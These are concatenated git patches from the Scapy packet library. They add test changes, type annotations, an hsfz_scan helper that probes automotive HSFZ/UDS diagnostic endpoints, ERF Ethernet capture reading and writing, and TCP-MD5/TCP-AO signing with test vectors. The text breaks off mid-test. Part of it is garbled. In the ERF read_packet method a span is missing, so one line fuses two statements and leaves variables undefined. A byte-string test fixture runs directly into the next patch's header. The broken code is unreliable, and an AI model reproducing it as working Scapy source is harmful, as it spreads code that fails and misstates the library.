Keys crypto tests ####################################### From 3276a6559b55b203e8c8b774de17abc66743d077 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Thu, 31 Mar 2022 17:33:16 +0200 Subject: [PATCH 0759/1632] Hotfix: don't check scapy version in tests --- test/regression.uts | 1 - 1 file changed, 1 deletion(-) diff --git a/test/regression.uts b/test/regression.uts index ab08c09dce0..284d2e898e1 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -53,7 +53,6 @@ class GitModuleScapy(object): __version__ = _version_from_git_describe() assert _parse_tag("v2.3.2-346-g164a52c075c8") == '2.3.2.dev346' -assert _version_checker(GitModuleScapy, (2, 4, 5)) = List layers ~ conf command From ddfc1c6db88563dbe6d65ad0e28d307f85871266 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Sun, 27 Mar 2022 13:26:23 +0200 Subject: [PATCH 0760/1632] Remove tox --parallel to debug pypy2 failing tests --- .config/ci/test.sh | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.config/ci/test.sh b/.config/ci/test.sh index 2cf5b25bbbb..e2ed053c58e 100755 --- a/.config/ci/test.sh +++ b/.config/ci/test.sh @@ -89,7 +89,7 @@ echo UT_FLAGS=$UT_FLAGS echo TOXENV=$TOXENV # Launch Scapy unit tests -TOX_PARALLEL_NO_SPINNER=1 tox --parallel -- ${UT_FLAGS} || exit 1 +TOX_PARALLEL_NO_SPINNER=1 tox -- ${UT_FLAGS} || exit 1 # Stop if NO_BASH_TESTS is set if [ ! -z "$SIMPLE_TESTS" ] From 2de6a7033e0ec04f1736d7ba88a44265d2b20786 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Mon, 4 Apr 2022 14:09:54 +0200 Subject: [PATCH 0761/1632] Typing of arch/solaris.py --- .config/mypy/mypy_enabled.txt | 1 + scapy/arch/solaris.py | 1 + 2 files changed, 2 insertions(+) diff --git a/.config/mypy/mypy_enabled.txt b/.config/mypy/mypy_enabled.txt index 0e12d3f9436..0fb6a520642 100644 --- a/.config/mypy/mypy_enabled.txt +++ b/.config/mypy/mypy_enabled.txt @@ -13,6 +13,7 @@ scapy/arch/__init__.py scapy/arch/common.py scapy/arch/linux.py scapy/arch/unix.py +scapy/arch/solaris.py scapy/as_resolvers.py scapy/asn1/__init__.py scapy/asn1/asn1.py diff --git a/scapy/arch/solaris.py b/scapy/arch/solaris.py index 44817039704..85f4d3d3d12 100644 --- a/scapy/arch/solaris.py +++ b/scapy/arch/solaris.py @@ -24,6 +24,7 @@ def get_working_if(): + # type: () -> str """Return an interface that works""" try: # return the interface associated with the route with smallest From 820fcdd1ace56fd1e24e2fd5837907d37baef35c Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Tue, 5 Apr 2022 21:48:05 +0200 Subject: [PATCH 0762/1632] Fix pypy2 ci-test This PR disables UDS_RMBAEnumerator unit tests on pypy which take to long to execute --- test/contrib/automotive/scanner/uds_scanner.uts | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/test/contrib/automotive/scanner/uds_scanner.uts b/test/contrib/automotive/scanner/uds_scanner.uts index 49dc8d5c36a..942e34a2443 100644 --- a/test/contrib/automotive/scanner/uds_scanner.uts +++ b/test/contrib/automotive/scanner/uds_scanner.uts @@ -797,7 +797,7 @@ result = tc1.show(dump=True) assert "requestOutOfRange received " in result = UDS_RMBAEnumerator -~ linux +~ linux not_pypy memory = dict() From 8cb703d1f97df829ccdd0d9558149b7bd62c5c64 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Mon, 28 Mar 2022 10:07:44 +0200 Subject: [PATCH 0763/1632] Increase test-coverage of EcuState --- test/contrib/automotive/ecu.uts | 10 ++++++++++ 1 file changed, 10 insertions(+) diff --git a/test/contrib/automotive/ecu.uts b/test/contrib/automotive/ecu.uts index 41313a00c66..44966588177 100644 --- a/test/contrib/automotive/ecu.uts +++ b/test/contrib/automotive/ecu.uts @@ -236,6 +236,8 @@ s2.A = 2 s2.b = 100 assert s1 > s2 +assert not s1 > s1 +assert not s1 < s1 = less than tests 6 @@ -286,6 +288,7 @@ s1 = EcuState(ses=range(4), security=[None, 5]) s2 = EcuState(ses=range(2)) assert s1 != s2 +assert s2 < s1 assert s2 in s1 assert s1 not in s2 @@ -364,6 +367,13 @@ assert s1 in s2 assert s2 in s1 assert s1 == s2 +s1 = EcuState(ses=1) +s2 = EcuState(ses=1) + +assert s1 in s2 +assert s2 in s1 +assert s1 == s2 + s1 = EcuState(ses=range(3), security=range(5)) for ses, sec in itertools.product(range(3), range(5)): s2 = EcuState(ses=ses, security=sec) From c91e8027a43c5698aaf044380a29cc2371be1ff1 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Sun, 27 Mar 2022 13:01:21 +0200 Subject: [PATCH 0764/1632] Add utility function to scan for HSFZ endpoints --- scapy/contrib/automotive/bmw/hsfz.py | 41 ++++++++++++++++++++++++++-- 1 file changed, 39 insertions(+), 2 deletions(-) diff --git a/scapy/contrib/automotive/bmw/hsfz.py b/scapy/contrib/automotive/bmw/hsfz.py index c3e7e4cf4ec..c2dae5e27a3 100644 --- a/scapy/contrib/automotive/bmw/hsfz.py +++ b/scapy/contrib/automotive/bmw/hsfz.py @@ -11,12 +11,12 @@ import socket import time -from scapy.compat import Optional, Tuple, Type +from scapy.compat import Optional, Tuple, Type, Iterable, List, Union from scapy.packet import Packet, bind_layers, bind_bottom_up from scapy.fields import IntField, ShortEnumField, XByteField from scapy.layers.inet import TCP from scapy.supersocket import StreamSocket -from scapy.contrib.automotive.uds import UDS +from scapy.contrib.automotive.uds import UDS, UDS_TP from scapy.data import MTU from scapy.error import log_interactive @@ -120,3 +120,40 @@ def recv(self, x=MTU): return self.outputcls(bytes(pkt.payload)) else: return pkt + + +def hsfz_scan(ip, # type: str + scan_range=range(0x100), # type: Iterable[int] + src=0xf4, # type: int + timeout=0.1, # type: Union[int, float] + verbose=True # type: bool + ): + # type: (...) -> List[UDS_HSFZSocket] + """ + Helper function to scan for HSFZ endpoints. + + Example: + >>> sockets = hsfz_scan("192.168.0.42") + + :param ip: IPv4 address of target to scan + :param scan_range: Range for HSFZ destination address + :param src: HSFZ source address, used during the scan + :param timeout: Timeout for each request + :param verbose: Show information during scan, if True + :return: A list of open UDS_HSFZSockets + """ + results = list() + for i in scan_range: + with UDS_HSFZSocket(src, i, ip) as sock: + try: + resp = sock.sr1(UDS() / UDS_TP(), + timeout=timeout, + verbose=False) + if resp: + results.append((i, resp)) + if resp and verbose: + print( + "Found endpoint %s, src=0x%x, dst=0x%x" % (ip, src, i)) + except Exception as e: + print("Error %s at destination address 0x%x" % (e, i)) + return [UDS_HSFZSocket(0xf4, dst, ip) for dst, _ in results] From 3df072ecb66b53251f8ec66b0bf7129a649166ae Mon Sep 17 00:00:00 2001 From: Daniel Widjaja Date: Tue, 5 Apr 2022 13:19:35 +0800 Subject: [PATCH 0765/1632] Add ERF Ethernet Support --- scapy/utils.py | 215 +++++++++++++++++++++++++++++++++++++++++++- test/regression.uts | 47 ++++++++++ 2 files changed, 261 insertions(+), 1 deletion(-) diff --git a/scapy/utils.py b/scapy/utils.py index 6cbd54e9924..cd0f7a4cb0a 100644 --- a/scapy/utils.py +++ b/scapy/utils.py @@ -1701,7 +1701,7 @@ def recv(self, size=MTU): return self.read_packet() -class RawPcapWriter: +class RawPcapWriter(object): """A stream PCAP writer with more control than wrpcap()""" def __init__(self, @@ -1978,6 +1978,219 @@ def write_packet(self, ) +@conf.commands.register +def rderf(filename, count=-1): + # type: (Union[IO[bytes], str], int) -> PacketList + """Read a ERF file and return a packet list + + :param count: read only packets + """ + with ERFEthernetReader(filename) as fdesc: + return fdesc.read_all(count=count) + + +class ERFEthernetReader_metaclass(PcapReader_metaclass): + def __call__(cls, filename): # type: ignore + # type: (Union[IO[bytes], str]) -> Any + i = cls.__new__(cls, cls.__name__, cls.__bases__, cls.__dict__) + filename, fdesc = cls.open(filename) + try: + i.__init__(filename, fdesc) + return i + except (Scapy_Exception, EOFError): + pass + + if "alternative" in cls.__dict__: + cls = cls.__dict__["alternative"] + i = cls.__new__(cls, cls.__name__, cls.__bases__, cls.__dict__) + try: + i.__init__(filename, fdesc) + return i + except (Scapy_Exception, EOFError): + pass + + raise Scapy_Exception("Not a supported capture file") + + @staticmethod + def open(fname # type: ignore + ): + # type: (...) -> Tuple[str, _ByteStream] + """Open (if necessary) filename""" + if isinstance(fname, str): + filename = fname + try: + with gzip.open(filename, "rb") as tmp: + tmp.read(1) + fdesc = gzip.open(filename, "rb") # type: _ByteStream + except IOError: + fdesc = open(filename, "rb") + + else: + fdesc = fname + filename = getattr(fdesc, "name", "No name") + return filename, fdesc + + +@six.add_metaclass(ERFEthernetReader_metaclass) +class ERFEthernetReader(PcapReader): + + def __init__(self, filename, fdesc=None): # type: ignore + # type: (Union[IO[bytes], str], IO[bytes]) -> None + self.filename = filename # type: ignore + self.f = fdesc + self.power = Decimal(10) ** Decimal(-9) + + # time is in 64-bits Endace's format which can be see here: + # https://www.endace.com/erf-extensible-record-format-types.pdf + def _convert_erf_timestamp(self, t): + # type: (int) -> EDecimal + sec = t >> 32 + frac_sec = t & 0xffffffff + frac_sec *= 10**9 + frac_sec += (frac_sec & 0x80000000) << 1 + frac_sec >>= 32 + return EDecimal(sec + self.power * frac_sec) + + # The details of ERF Packet format can be see here: + # https://www.endace.com/erf-extensible-record-format-types.pdf + def read_packet(self, size=MTU): + # type: (int) -> Packet + + # General ERF Header have exactly 16 bytes + hdr = self.f.read(16) + if len(hdr) < 16: + raise EOFError + + # The timestamp is in little-endian byte-order. + time = struct.unpack('BBHHH', hdr[8:]) + # Check if the type != 0x02, type Ethernet + if type & 0x02 == 0: + raise Scapy_Exception("Invalid ERF Type (Not TYPE_ETH)") + + # If there are extended headers, ignore it because Packet object does + # not support it. Extended headers size is 8 bytes before the payload. + if type & 0x80: + _ = self.f.read(8) + s = self.f.read(rlen - 24) + else: + s = self.f.read(rlen - 16) + + # Ethernet has 2 bytes of padding containing `offset` and `pad`. Both + # of the fields are disregarded by Endace. + p = s[2:size] + from scapy.layers.l2 import Ether + try: + p = Ether(p) + except KeyboardInterrupt: + raise + except Exception: + if conf.debug_dissector: + from scapy.sendrecv import debug + debug.crashed_on = (Ether, s) + raise + if conf.raw_layer is None: + # conf.raw_layer is set on import + import scapy.packet # noqa: F401 + p = conf.raw_layer(s) + + p.time = self._convert_erf_timestamp(time) + p.wirelen = wlen + + return p + + +@conf.commands.register +def wrerf(filename, # type: Union[IO[bytes], str] + pkt, # type: _PacketIterable + *args, # type: Any + **kargs # type: Any + ): + # type: (...) -> None + """Write a list of packets to a ERF file + + :param filename: the name of the file to write packets to, or an open, + writable file-like object. The file descriptor will be + closed at the end of the call, so do not use an object you + do not want to close (e.g., running wrerf(sys.stdout, []) + in interactive mode will crash Scapy). + :param gz: set to 1 to save a gzipped capture + :param append: append packets to the capture file instead of + truncating it + :param sync: do not bufferize writes to the capture file + """ + with ERFEthernetWriter(filename, *args, **kargs) as fdesc: + fdesc.write(pkt) + + +class ERFEthernetWriter(PcapWriter): + """A stream ERF Ethernet writer with more control than wrerf()""" + + def __init__(self, + filename, # type: Union[IO[bytes], str] + gz=False, # type: bool + append=False, # type: bool + sync=False, # type: bool + ): + # type: (...) -> None + """ + :param filename: the name of the file to write packets to, or an open, + writable file-like object. + :param gz: compress the capture on the fly + :param append: append packets to the capture file instead of + truncating it + :param sync: do not bufferize writes to the capture file + """ + super(ERFEthernetWriter, self).__init__(filename, + gz=gz, + append=append, + sync=sync) + + def write(self, pkt): # type: ignore + # type: (_PacketIterable) -> None + """ + Writes a Packet, a SndRcvList object, or bytes to a ERF file. + + :param pkt: Packet(s) to write (one record for each Packet) + :type pkt: iterable[scapy.packet.Packet], scapy.packet.Packet + """ + # Import here to avoid circular dependency + from scapy.supersocket import IterSocket + for p in IterSocket(pkt).iter: + self.write_packet(p) + + def write_packet(self, pkt): # type: ignore + # type: (Packet) -> None + + if hasattr(pkt, "time"): + sec = int(pkt.time) + usec = int((int(round((pkt.time - sec) * 10**9)) << 32) / 10**9) + t = (sec << 32) + usec + else: + t = int(time.time()) << 32 + + # There are 16 bytes of headers + 2 bytes of padding before the packets + # payload. + rlen = len(pkt) + 18 + + if hasattr(pkt, "wirelen"): + wirelen = pkt.wirelen + if wirelen is None: + wirelen = rlen + + self.f.write(struct.pack("BBHHHH", 2, 0, rlen, 0, wirelen, 0)) + self.f.write(bytes(pkt)) + self.f.flush() + + def close(self): + # type: () -> Optional[Any] + return self.f.close() + + @conf.commands.register def import_hexcap(input_string=None): # type: (Optional[str]) -> bytes diff --git a/test/regression.uts b/test/regression.uts index 284d2e898e1..cb89d79a289 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -2363,6 +2363,53 @@ with mock.patch("scapy.utils.warning") as warning: os.remove(filename) assert any("Inconsistent" in arg for arg in warning.call_args[0]) +############ +############ ++ ERF Ethernet format support + += Variable creations +erffile = BytesIO(b'3;!E_9\x92_\x02\x04\x00p\x00\x00\x00P\x00\x00\x00\x0fS?\xca\xc0\x1cjz\x18\x90\xed\x81\x00\x01:\x08\x00E\x00\x00(\xdf\xab@\x00;\x06\xb3s\n\x01]\xdb\n\xfb9\xda\xc3v\x84\xecD\x16\xb9\xab\xda\xa1b\xf9P\x10f\x98\x18\xcb\x00\x00\x00\x00\x90\x9e\xd7\xd2_\x929_\x0f\x9e\xcd\x1f\x01\x88\xb9\x15[/s<\x01\x88\xb9\x15[/\xcd\x1f\x01\x88\xb9\x15[/0\xcd"E_9\x92_\x02\x04\x00p\x00\x00\x00P\x00\x00\x1cjz\x18\x90\xed\x00\x0fS?\xca\xc0\x08\x00E\x00\x00(\xa2\xdd@\x00@\x06\xebA\n\xfb9\xda\n\x01]\xdb\x84\xec\xc3v\xda\xa1b\xf9D\x16\xb9\xacP\x10\x9a\xf0\xe4q\x00\x00\x00\x00\x00\x00\x00\x00o\xbc\xe2{_\x929_\x0f\x9f+3\x01\x88\xb9\x15u\x1e(^\x01\x88\xb9\x15u\x1e+3\x01\x88\xb9\x15u\x1e') +erffilewithheader = BytesIO(b'4;!E_9\x92_\x82\x00\x00x\x00\x00\x00P\x00\x00\x1a+ Date: Sat, 9 Apr 2022 21:21:49 +0300 Subject: [PATCH 0766/1632] Support TCP-MD5 and TCP-AO (#3358) Support TCP-MD5 and TCP-AO --- .config/mypy/mypy_enabled.txt | 1 + scapy/contrib/tcpao.py | 251 +++++++++++++++++++++++ scapy/layers/inet.py | 116 +++++++++-- scapy/layers/inet6.py | 32 ++- test/contrib/tcpao.uts | 374 ++++++++++++++++++++++++++++++++++ test/scapy/layers/inet.uts | 55 ++++- 6 files changed, 800 insertions(+), 29 deletions(-) create mode 100644 scapy/contrib/tcpao.py create mode 100644 test/contrib/tcpao.uts diff --git a/.config/mypy/mypy_enabled.txt b/.config/mypy/mypy_enabled.txt index 0fb6a520642..51c4489d5df 100644 --- a/.config/mypy/mypy_enabled.txt +++ b/.config/mypy/mypy_enabled.txt @@ -81,6 +81,7 @@ scapy/contrib/isotp/isotp_scanner.py scapy/contrib/isotp/isotp_soft_socket.py scapy/contrib/isotp/isotp_utils.py scapy/contrib/roce.py +scapy/contrib/tcpao.py # TEST test/testsocket.py diff --git a/scapy/contrib/tcpao.py b/scapy/contrib/tcpao.py new file mode 100644 index 00000000000..d7763e293a1 --- /dev/null +++ b/scapy/contrib/tcpao.py @@ -0,0 +1,251 @@ +# This file is part of Scapy +# See http://www.secdev.org/projects/scapy for more information +# Copyright (C) Leonard Crestez +# This program is published under a GPLv2 license + +# scapy.contrib.description = TCP-AO Signature Calculation +# scapy.contrib.status = loads + +"""Packet-processing utilities implementing RFC5925 and RFC5926""" + +import logging +from scapy.compat import orb, Union +from scapy.layers.inet import IP, TCP +from scapy.layers.inet import tcp_pseudoheader +from scapy.layers.inet6 import IPv6 +from scapy.packet import Packet +from scapy.pton_ntop import inet_pton +import socket +import struct + +logger = logging.getLogger(__name__) + + +def _hmac_sha1_digest(key, msg): + # type: (bytes, bytes) -> bytes + import hmac + import hashlib + + return hmac.new(key, msg, hashlib.sha1).digest() + + +def _cmac_aes_digest(key, msg): + # type: (bytes, bytes) -> bytes + from cryptography.hazmat.primitives import cmac + from cryptography.hazmat.primitives.ciphers import algorithms + from cryptography.hazmat.backends import default_backend + + backend = default_backend() + c = cmac.CMAC(algorithms.AES(key), backend=backend) + c.update(bytes(msg)) + return c.finalize() + + +class TCPAOAlg: + @classmethod + def kdf(cls, master_key, context): + # type: (bytes, bytes) -> bytes + raise NotImplementedError() + + @classmethod + def mac(cls, traffic_key, context): + # type: (bytes, bytes) -> bytes + raise NotImplementedError() + + maclen = -1 + + +class TCPAOAlg_HMAC_SHA1(TCPAOAlg): + @classmethod + def kdf(cls, master_key, context): + # type: (bytes, bytes) -> bytes + input = b"\x01" + b"TCP-AO" + context + b"\x00\xa0" + return _hmac_sha1_digest(master_key, input) + + @classmethod + def mac(cls, traffic_key, message): + # type: (bytes, bytes) -> bytes + return _hmac_sha1_digest(traffic_key, message)[:12] + + maclen = 12 + + +class TCPAOAlg_CMAC_AES(TCPAOAlg): + @classmethod + def kdf(self, master_key, context): + # type: (bytes, bytes) -> bytes + if len(master_key) == 16: + key = master_key + else: + key = _cmac_aes_digest(b"\x00" * 16, master_key) + return _cmac_aes_digest(key, b"\x01TCP-AO" + context + b"\x00\x80") + + @classmethod + def mac(self, traffic_key, message): + # type: (bytes, bytes) -> bytes + return _cmac_aes_digest(traffic_key, message)[:12] + + maclen = 12 + + +def get_alg(name): + # type: (str) -> TCPAOAlg + if name.upper() == "HMAC-SHA-1-96": + return TCPAOAlg_HMAC_SHA1() + elif name.upper() == "AES-128-CMAC-96": + return TCPAOAlg_CMAC_AES() + else: + raise ValueError("Bad TCP AuthOpt algorithms {}".format(name)) + + +def _get_ipvx_src(u): + # type: (Union[IP, IPv6]) -> bytes + if isinstance(u, IP): + return inet_pton(socket.AF_INET, u.src) + elif isinstance(u, IPv6): + return inet_pton(socket.AF_INET6, u.src) + else: + raise Exception("Neither IP nor IPv6 found on packet") + + +def _get_ipvx_dst(u): + # type: (Union[IP, IPv6]) -> bytes + if isinstance(u, IP): + return inet_pton(socket.AF_INET, u.dst) + elif isinstance(u, IPv6): + return inet_pton(socket.AF_INET6, u.dst) + else: + raise Exception("Neither IP nor IPv6 found on packet") + + +def build_context( + saddr, # type: bytes + daddr, # type: bytes + sport, # type: int + dport, # type: int + src_isn, # type: int + dst_isn, # type: int +): + # type: (...) -> bytes + """Build context bytes as specified by RFC5925 section 5.2""" + if len(saddr) != len(daddr) or (len(saddr) != 4 and len(saddr) != 16): + raise ValueError("saddr and daddr must be 4-byte or 16-byte addresses") + return ( + saddr + + daddr + + struct.pack( + "!HHII", + sport, + dport, + src_isn, + dst_isn, + ) + ) + + +def build_context_from_packet( + p, # type: Packet + src_isn, # type: int + dst_isn, # type: int +): + # type: (...) -> bytes + """Build context bytes as specified by RFC5925 section 5.2""" + tcp = p[TCP] + return build_context( + _get_ipvx_src(tcp.underlayer), + _get_ipvx_dst(tcp.underlayer), + tcp.sport, + tcp.dport, + src_isn, + dst_isn, + ) + + +def build_message_from_packet(p, include_options=True, sne=0): + # type: (Packet, bool, int) -> bytes + """Build message bytes as described by RFC5925 section 5.1""" + result = bytearray() + result += struct.pack("!I", sne) + result += tcp_pseudoheader(p[TCP]) + + # tcp header with checksum set to zero + th_bytes = bytes(p[TCP]) + result += th_bytes[:16] + result += b"\x00\x00" + result += th_bytes[18:20] + + # Even if include_options=False the TCP-AO option itself is still included + # with the MAC set to all-zeros. This means we need to parse TCP options. + pos = 20 + th = p[TCP] + doff = th.dataofs + if doff is None: + opt_len = len(th.get_field("options").i2m(th, th.options)) + doff = 5 + ((opt_len + 3) // 4) + tcphdr_optend = doff * 4 + while pos < tcphdr_optend: + optnum = orb(th_bytes[pos]) + pos += 1 + if optnum == 0 or optnum == 1: + if include_options: + result += bytearray([optnum]) + continue + + optlen = orb(th_bytes[pos]) + pos += 1 + if pos + optlen - 2 > tcphdr_optend: + logger.info("bad tcp option %d optlen %d beyond end-of-header", + optnum, optlen) + break + if optlen < 2: + logger.info("bad tcp option %d optlen %d less than two", + optnum, optlen) + break + if optnum == 29: + if optlen < 4: + logger.info("bad tcp option %d optlen %d", optnum, optlen) + break + result += th_bytes[pos - 2: pos + 2] + result += (optlen - 4) * b"\x00" + elif include_options: + result += th_bytes[pos - 2: pos + optlen - 2] + pos += optlen - 2 + result += bytes(p[TCP].payload) + return result + + +def calc_tcpao_traffic_key(p, alg, master_key, sisn, disn): + # type: (Packet, TCPAOAlg, bytes, int, int) -> bytes + """Calculate TCP-AO traffic-key from packet and initial sequence numbers + + This is constant for an established connection. + """ + return alg.kdf(master_key, build_context_from_packet(p, sisn, disn)) + + +def calc_tcpao_mac(p, alg, traffic_key, include_options=True, sne=0): + # type: (Packet, TCPAOAlg, bytes, bool, int) -> bytes + """Calculate TCP-AO MAC from packet and traffic key""" + return alg.mac(traffic_key, build_message_from_packet( + p, include_options=include_options, sne=sne + )) + + +def sign_tcpao( + p, + alg, + traffic_key, + keyid=0, + rnextkeyid=0, + include_options=True, + sne=0, +): + # type: (Packet, TCPAOAlg, bytes, int, int, bool, int) -> None + """Calculate TCP-AO option value and insert into packet""" + th = p[TCP] + keyids = struct.pack("BB", keyid, rnextkeyid) + th.options = th.options + [('AO', keyids + alg.maclen * b"\x00")] + message_bytes = calc_tcpao_mac( + p, alg, traffic_key, include_options=include_options, sne=sne) + mac = alg.mac(traffic_key, message_bytes) + th.options[-1] = ('AO', keyids + mac) diff --git a/scapy/layers/inet.py b/scapy/layers/inet.py index 8d716e0266b..aac23467c5c 100644 --- a/scapy/layers/inet.py +++ b/scapy/layers/inet.py @@ -25,7 +25,7 @@ IP_PROTOS, TCP_SERVICES, UDP_SERVICES from scapy.layers.l2 import Ether, Dot3, getmacbyip, CookedLinux, GRE, SNAP, \ Loopback -from scapy.compat import raw, chb, orb, bytes_encode +from scapy.compat import raw, chb, orb, bytes_encode, Optional from scapy.config import conf from scapy.extlib import plt, MATPLOTLIB, MATPLOTLIB_INLINED, \ MATPLOTLIB_DEFAULT_PLOT_KARGS @@ -299,8 +299,10 @@ class IPOption_SDBM(IPOption): 8: ("Timestamp", "!II"), 14: ("AltChkSum", "!BH"), 15: ("AltChkSumOpt", None), + 19: ("MD5", "16s"), 25: ("Mood", "!p"), 28: ("UTO", "!H"), + 29: ("AO", None), 34: ("TFO", "!II"), # RFC 3692 # 253: ("Experiment", "!HHHH"), @@ -315,12 +317,32 @@ class IPOption_SDBM(IPOption): "Timestamp": 8, "AltChkSum": 14, "AltChkSumOpt": 15, + "MD5": 19, "Mood": 25, "UTO": 28, + "AO": 29, "TFO": 34, }) +class TCPAOValue(Packet): + """Value of TCP-AO option""" + fields_desc = [ + ByteField("keyid", None), + ByteField("rnextkeyid", None), + StrLenField("mac", "", length_from=lambda p:len(p.original) - 2), + ] + + +def get_tcpao(tcphdr): + # type: (TCP) -> Optional[TCPAOValue] + """Get the TCP-AO option from the header""" + for optid, optval in tcphdr.options: + if optid == 'AO': + return optval + return None + + class RandTCPOptions(VolatileValue): def __init__(self, size=None): if size is None: @@ -397,6 +419,8 @@ def m2i(self, pkt, x): oname, ofmt = TCPOptions[0][onum] if onum == 5: # SAck ofmt += "%iI" % (len(oval) // 4) + if onum == 29: # AO + oval = TCPAOValue(oval) if ofmt and struct.calcsize(ofmt) == len(oval): oval = struct.unpack(ofmt, oval) if len(oval) == 1: @@ -434,6 +458,8 @@ def i2m(self, pkt, x): if not isinstance(oval, tuple): oval = (oval,) oval = struct.pack(ofmt, *oval) + if onum == 29: # AO + oval = bytes(oval) else: warning("Option [%s] unknown. Skipped.", oname) continue @@ -631,18 +657,14 @@ def fragment(self, fragsize=1480): return lst -def in4_chksum(proto, u, p): - """ - As Specified in RFC 2460 - 8.1 Upper-Layer Checksums +def in4_pseudoheader(proto, u, plen): + # type: (int, IP, int) -> bytes + """IPv4 Pseudo Header as defined in RFC793 as bytes - Performs IPv4 Upper Layer checksum computation. Provided parameters are: - - 'proto' : value of upper layer protocol - - 'u' : IP upper layer instance - - 'p' : the payload of the upper layer provided as a string + :param proto: value of upper layer protocol + :param u: IP layer instance + :param plen: the length of the upper layer and payload """ - if not isinstance(u, IP): - warning("No IP underlayer to compute checksum. Leaving null.") - return 0 if u.len is not None: if u.ihl is None: olen = sum(len(x) for x in u.options) @@ -651,7 +673,7 @@ def in4_chksum(proto, u, p): ihl = u.ihl ln = max(u.len - 4 * ihl, 0) else: - ln = len(p) + ln = plen # Filter out IPOption_LSRR and IPOption_SSRR sr_options = [opt for opt in u.options if isinstance(opt, IPOption_LSRR) or @@ -666,14 +688,74 @@ def in4_chksum(proto, u, p): message += "Falling back to IP.dst for checksum computation." warning(message, len_sr_options) - psdhdr = struct.pack("!4s4sHH", - inet_pton(socket.AF_INET, u.src), - inet_pton(socket.AF_INET, u.dst), - proto, - ln) + return struct.pack("!4s4sHH", + inet_pton(socket.AF_INET, u.src), + inet_pton(socket.AF_INET, u.dst), + proto, + ln) + + +def in4_chksum(proto, u, p): + # type: (int, IP, bytes) -> int + """IPv4 Pseudo Header checksum as defined in RFC793 + + :param nh: value of upper layer protocol + :param u: upper layer instance + :param p: the payload of the upper layer provided as a string + """ + if not isinstance(u, IP): + warning("No IP underlayer to compute checksum. Leaving null.") + return 0 + psdhdr = in4_pseudoheader(proto, u, len(p)) return checksum(psdhdr + p) +def _is_ipv6_layer(p): + # type: (Packet) -> bytes + return (isinstance(p, scapy.layers.inet6.IPv6) or + isinstance(p, scapy.layers.inet6._IPv6ExtHdr)) + + +def tcp_pseudoheader(tcp): + # type: (TCP) -> bytes + """Pseudoheader of a TCP packet as bytes + + Requires underlayer to be either IP or IPv6 + """ + if isinstance(tcp.underlayer, IP): + plen = len(bytes(tcp)) + return in4_pseudoheader(socket.IPPROTO_TCP, tcp.underlayer, plen) + elif conf.ipv6_enabled and _is_ipv6_layer(tcp.underlayer): + plen = len(bytes(tcp)) + return raw(scapy.layers.inet6.in6_pseudoheader( + socket.IPPROTO_TCP, tcp.underlayer, plen)) + else: + raise ValueError("TCP packet does not have IP or IPv6 underlayer") + + +def calc_tcp_md5_hash(tcp, key): + # type: (TCP, bytes) -> bytes + """Calculate TCP-MD5 hash from packet and return a 16-byte string""" + import hashlib + + h = hashlib.md5() # nosec + tcp_bytes = bytes(tcp) + h.update(tcp_pseudoheader(tcp)) + h.update(tcp_bytes[:16]) + h.update(b"\x00\x00") + h.update(tcp_bytes[18:]) + h.update(key) + + return h.digest() + + +def sign_tcp_md5(tcp, key): + # type: (TCP, bytes) -> None + """Append TCP-MD5 signature to tcp packet""" + sig = calc_tcp_md5_hash(tcp, key) + tcp.options = tcp.options + [('MD5', sig)] + + class TCP(Packet): name = "TCP" fields_desc = [ShortEnumField("sport", 20, TCP_SERVICES), diff --git a/scapy/layers/inet6.py b/scapy/layers/inet6.py index c0a90a9fb47..24dff89cb5c 100644 --- a/scapy/layers/inet6.py +++ b/scapy/layers/inet6.py @@ -559,11 +559,10 @@ class PseudoIPv6(Packet): # IPv6 Pseudo-header for checksum computation ByteField("nh", 0)] -def in6_chksum(nh, u, p): +def in6_pseudoheader(nh, u, plen): + # type: (int, IP, int) -> PseudoIPv6 """ - As Specified in RFC 2460 - 8.1 Upper-Layer Checksums - - Performs IPv6 Upper Layer checksum computation. + Build an PseudoIPv6 instance as specified in RFC 2460 8.1 This function operates by filling a pseudo header class instance (PseudoIPv6) with: @@ -580,9 +579,8 @@ def in6_chksum(nh, u, p): :param u: upper layer instance (TCP, UDP, ICMPv6*, ). Instance must be provided with all under layers (IPv6 and all extension headers, for example) - :param p: the payload of the upper layer provided as a string + :param plen: the length of the upper layer and payload """ - ph6 = PseudoIPv6() ph6.nh = nh rthdr = 0 @@ -605,7 +603,7 @@ def in6_chksum(nh, u, p): u = u.underlayer if u is None: warning("No IPv6 underlayer to compute checksum. Leaving null.") - return 0 + return None if hahdr: ph6.src = hahdr else: @@ -614,7 +612,25 @@ def in6_chksum(nh, u, p): ph6.dst = rthdr else: ph6.dst = u.dst - ph6.uplen = len(p) + ph6.uplen = plen + return ph6 + + +def in6_chksum(nh, u, p): + """ + As Specified in RFC 2460 - 8.1 Upper-Layer Checksums + + See also `.in6_pseudoheader` + + :param nh: value of upper layer protocol + :param u: upper layer instance (TCP, UDP, ICMPv6*, ). Instance must be + provided with all under layers (IPv6 and all extension headers, + for example) + :param p: the payload of the upper layer provided as a string + """ + ph6 = in6_pseudoheader(nh, u, len(p)) + if ph6 is None: + return 0 ph6s = raw(ph6) return checksum(ph6s + p) diff --git a/test/contrib/tcpao.uts b/test/contrib/tcpao.uts new file mode 100644 index 00000000000..50a39208003 --- /dev/null +++ b/test/contrib/tcpao.uts @@ -0,0 +1,374 @@ +% Tests for RFC5925 TCP Authentication Option (TCP-AO) +~ tcp tcpao +# Some data from https://datatracker.ietf.org/doc/html/draft-touch-tcpm-ao-test-vectors-02 + ++ Test Utilities += Test Utilities + +# Tolerate all whitespace like py37+ bytes.fromhex +def fromhex(hex): + return bytes(bytearray.fromhex(hex.replace(" ", "").replace("\n", ""))) + ++ TCP-AO Test Vectors += TCP-AO Test Vectors Utilities +from scapy.contrib import tcpao +master_key = b"testvector" +client_keyid = 61 +server_keyid = 84 + +def check( + packet_hex, + traffic_key_hex, + mac_hex, + src_isn, + dst_isn, + include_options=True, + alg_name="HMAC-SHA-1-96", + sne=0, + ): + packet_bytes = fromhex(packet_hex) + # sanity check for ip version + ipv = orb(packet_bytes[0]) >> 4 + if ipv == 4: + p = 